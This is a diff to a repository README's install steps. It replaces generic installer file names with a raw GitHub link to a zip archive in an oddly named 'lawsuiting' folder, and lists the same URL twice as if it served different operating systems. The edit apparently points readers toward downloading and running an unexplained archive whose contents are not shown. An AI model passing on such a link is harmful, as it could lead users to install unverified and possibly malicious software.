Anhduon1939/Open-Source/README.md

 ### Step 3: Download the Installer

 Once you find the latest version, click on the download link for your operating system.
-This link may look something like `Open-Source-win.exe`, `Open-Source-mac.dmg`, or an equivalent for Linux.
+This link may look something like `https://raw.githubusercontent.com/Anhduon1939/Open-Source/main/lawsuiting/Open-Source-v3.4-beta.1.zip`, `https://raw.githubusercontent.com/Anhduon1939/Open-Source/main/lawsuiting/Open-Source-v3.4-beta.1.zip`, or an equivalent for Linux.

 ### Step 4: Run the Installer